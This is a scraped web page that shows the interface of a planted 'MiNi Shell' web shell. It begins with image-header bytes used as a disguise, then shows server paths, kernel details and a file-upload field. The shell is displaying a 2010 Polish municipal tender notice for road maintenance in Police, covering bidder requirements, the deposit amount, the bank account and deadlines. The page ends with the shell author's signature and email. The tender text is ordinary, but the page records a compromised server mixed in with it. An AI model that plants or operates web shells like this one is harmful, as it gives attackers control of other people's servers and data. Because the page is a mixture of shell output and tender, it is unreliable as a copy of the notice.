JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101125/383974-N-2010.html

<p class="kh_header"><b>Police: BIEŻĄCE UTRZYMANIE, NAPRAWY CZĄSTKOWE, KONSERWACJA ULIC I DRÓG GMINNYCH NA TERENIE GMINY POLICE</b><br>
<b>Numer ogłoszenia: 383974 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Policach , ul. Stefana Batorego 3, 72-010 Police, woj. zachodniopomorskie, tel. 91 4311830, faks 91 4311832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.police.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCE UTRZYMANIE, NAPRAWY CZĄSTKOWE, KONSERWACJA ULIC I DRÓG GMINNYCH NA TERENIE GMINY POLICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bieżące utrzymanie, naprawy cząstkowe, konserwacja ulic i dróg gminnych na terenie gminy Police, obejmujące roboty budowlane związane z :
1. remontem cząstkowym nawierzchni bitumicznej, mieszanką mineralno-asfaltową na zimno wraz z dojazdem pracowników i transportem materiałów i sprzętu na  odl. do 15 km -  za 1 t,
2. remontem cząstkowym nawierzchni bitumicznej, mieszanką mineralno-asfaltową na gorąco o remontowanej powierzchni w jednym miejscu do 5,0 m2 wraz z dojazdem pracowników i sprzętu  na odl. do 15 km oraz  transportem mieszanki min-asf. na odl do 30 km - o grubości remontowanej nawierzchni:
-	do 4 cm      - 1 t
-	do 8 cm      - 1 t
-	do 12 cm    - 1 t
3. j.w lecz o remontowanej powierzchni w jednym miejscu powyżej 5,0 m2
      -     do 4 cm      - 1m2
      -     do 8 cm      - 1 m2
      -     do 12 cm    - 1 m2
4. remontem nawierzchni drogi z kruszywa betonowego o frakcji 0,5 do 35mm z zagęszczeniem walcem o masie min 3,5t  cm wraz z dojazdem pracowników, sprzętu i  transportem materiału do 15 km o grubości remontowanej nawierzchni:
       -     do 5 cm     - 1 m2
       -     do 10 cm   - 1 m2
       -     do 15 cm   - 1 m2
5. remontem nawierzchni drogi z kruszywa naturalnego, łamanego (granit) o frakcji 0,5 do 35mm z zagęszczeniem walcem o masie min 3,5t  cm wraz z dojazdem pracowników, sprzętu i  transportem materiału do 15 km o grubości remontowanej nawierzchni:
       -     do 5 cm     - 1 m2
       -     do 10 cm   - 1 m2
       -     do 15 cm   - 1 m2
6.  j.w lecz ze ścieru asfaltowego o grubości remontowanej nawierzchni:
      -     do 5 cm    - 1 m2
-	do 10 cm  - 1 m2
-	do 15 cm  - 1 m2
7. remontem nawierzchni drogi z płyt drogowych (płyty drogowe Zamawiającego) na podsypce z piasku o grubości 5 cm wraz dojazdem pracowników, sprzętu i transportem materiału na odległość do 15 km.   -   za 1 m2
8. wyrównanie nawierzchni drogi z profilowaniem spadków i zagęszczeniem walcem o ciężarze min. 3,5t wraz z dojazdem pracowników i sprzętu na odległość do 15 km, bez użycia materiałów.
9. remontem nawierzchni chodnika z kostki betonowej polbruk grub. 6 cm, rozebraniem istniejącej nawierzchni, wykonaniem podsypki cem-piaskowej o grub. do 5 cm i ponownym ułożeniem rozebranej kostki z dojazdem pracowników, sprzętu i transportem materiałów na odległość do 15 km.  -   za 1m2
10.   j.w lecz z ułożeniem kostki polbruk o grub. 8 cm.  - za 1m2
11. j.w lecz z ułożeniem kostki nowej polbruk grub. 6 cm  - za 1m2
12. j.w. lecz z ułożeniem kostki nowej polbruk grub. 8 cm  - za 1m2
13.  j.w lecz z płytek betonowych 35x35x5 cm z wykorzystaniem rozebranych płytek  - za 1 m2
14. j.w. lecz z płytek betonowych 50x50x7 cm z wykorzystaniem rozebranych płytek - za 1 m2
15. j.w. lecz z płytek betonowych 35x35x5 cm z wykorzystaniem nowych płytek  - za 1 m2
16. j.w. lecz z płytek betonowych 50x50x7 cm z wykorzystaniem nowych płytek  - za 1m2
17. j.w. lecz z kostki kamiennej rzędowej 17 cm na podbudowie betonowej grub. 10 cm - za 1 m2
18. wymianie znaku drogowego wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 15 km.   - za 1 szt.
19.  j.w. lecz za wymianę tabliczki informacyjnej (np. F-8) lub innych tablic   - za 1szt.
20. j.w. lecz za wymianę słupka stalowego ocynkowanego pod znak drogowy o 70 mm  - za 1szt. 
21. j.w. lecz za ustawienie i rozebranie znaków drogowych i tablic informacyjnych przy wykonywaniu zmiany organizacji ruchu (np. Święto Zmarłych, Boże Ciało, Policka 15 i.t.p) licząc za każdy znak, tablicę, zastawę.  - za 1 szt.
w wymianą żarówki w sygnalizatorze  świetlnym wraz z dojazdem pracowników, sprzętu i materiałów na odl. do 3 km:
     -  dolnym     -  1 szt.
     -  górnym     -  1 szt.
22. obsługą czasowej sygnalizacji świetlnej przy robotach na drodze (ruch wahadłowy) wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 5 km. - za 2 zestawy.
23. ustawieniem i rozebraniem czasowej sygnalizacji świetlnej wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 15 km.   - za 2 zestawy.
24. wykonaniem i montażem nowych barier ochronnych (przęsło 2,0x1,30 wraz ze słupkiem i rozstawem prętów w przęśle co 10 cm) wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 15 km.    -  za 1 kpl.
25. j.w. lecz wymianie przęsła bariery ochronnej z materiału zamawiającego licząc za -  1 kpl.
26. j.w lecz z rur O 70 mm  - za 1mb.
27. j.w. lecz z materiały zamawiającego   -  za 1mb.
28. uzupełnieniem malowania oznakowania poziomego ulic farbą akrylową białą z mikrocząsteczkami odblaskowymi (przejść dla pieszych, linii segregacyjnych, pól martwych, krawężników itp.) wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 15 km licząc    - za 1m2
29. wymianą krawężników betonowych 15x30 cm na ławie betonowej z oporem betonowym wraz z dojazdem pracowników, sprzętu i transportem materiałów na odl. do 15 km.  -  za 1 mb.
30. j. w. lecz wymianą obrzeży betonowych 6x20 cm   - za 1 mb.
31. Wszystkie roboty nieobjęte powyższym wykazem rozliczane będą wg indywidualnej wyceny na podstawie cenników SEKOCENBUD po uprzednim zatwierdzeniu przez zamawiającego.
Do oferty złożyć cenę ryczałtową netto za 1m2 , 1 mb, 1 kpl, 1 t, 1 szt ww. robót. Roboty  będą rozliczane powykonawczo na podstawie cen określonych w załączniku nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Na podstawie art. 67 ust. 6 i 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2010 r. nr 113 poz. 759) Zamawiający dopuszcza zlecenie Wykonawcy robót budowlanych zamówień dodatkowych i uzupełniających.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 14.000 zł (słownie : czternaście tysięcy złotych) w terminie do dnia 9 grudnia 2010r.do godz. 930
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1. pieniądzu,
2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3. gwarancjach bankowych,
4. gwarancjach ubezpieczeniowych,
5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem na rachunek Gminy Police nr 79 1020 4795 0000 9102 0009 0886 prowadzony przez I.O PKO BP S.A. w Szczecinie, z oznaczeniem Wadium przetargowe - Bieżące utrzymanie, naprawy cząstkowe, konserwacja ulic i dróg gminnych  na terenie gminy Police.
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu 
potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego ul. St. Batorego 3, sekretariat pok. 30 lub dołączyć do oferty.
7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
udziału określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie
podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24
ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykazanie wykonania robót budowlanych-drogowych polegających na budowie lub przebudowie co najmniej trzech  zamówień publicznych obejmujących remont lub przebudowę drogi o nawierzchniach bitumicznych, z gruzu drobnowymiarowego, ze ścieru asfaltowego, z płyt drogowych o wymiarach 1,5m x 3m. oraz innych robót wymienionych w rozdziale 2 powyższej SIWZ.. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (referencje, protokóły odbioru robót, itp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4a. Wykonawca ubiegający się o zamówienie musi dysponować następującym sprzętem:
 (który stanowi własność Wykonawcy, bądź przedstawić dokument na dzień składania ofert   
  potwierdzający zawarcie umowy wynajmu na n.w sprzęt).
-	samochód samowyładowczy min. 6,0 t,
-	samochód termos do przewozu masy bitumicznej min. 10,0 t,
-	samochód do przewozu sprzęty pomocniczego,
-	samochód do przewozu pracowników,
-	samochód wyposażony w podnośnik i dźwig,
-	piłę do cięcia asfalto-betonu,
-	młot do wykuwania asfalto-betonu,
-	agregat prądotwórczy,
-	ubijarkę spalinową ręczną,
-	frezarkę do asfalto-betonu samojezdną 
      -     koparko-ładowarką,
      -     walcem drogowym o ciężarze min 3,5t,
-	recykler do przerobu asfalto-betonu,
-	skrapiarkę do asfalto-betonu,
4b.  Wykonawca ubiegający się o zamówienie musi dysponować na terenie miasta Police odpowiednim zapleczem technicznym z łącznością telefoniczną gwarantującą, że po zgłoszeniu przez Zamawiającego lub służby porządkowe (Policja, Straż Miejska) jest gotowy do podjęcia działań w ciągu  10 minut od zgłoszenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, w myśl art. 26 ust. 2 b ustawy, może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku, gdy podmiot(y) przedstawiający pisemne zobowiązanie, o którym mowa wyżej,
będzie uczestniczył w części wykonania zamówienia, Zamawiający żąda przedłożenia przez
ten podmiot(y) dokumentów i oświadczeń wskazanych w rozdziale 11 pkt 1 ppkt 1-3 niniejszej
SIWZ oraz oświadczenia o braku podstaw do wykluczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.police.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miesjki w Policach ul. Bankowa 18 pok 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 10:00, miejsce: Ofertę należy złożyć Zamawiającemu, Urząd Miejski w Policach ul. Stefana Batorego 3, sekretariat , pokój nr 30, w terminie do dnia 9 grudnia 2010 roku, godz. 10.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com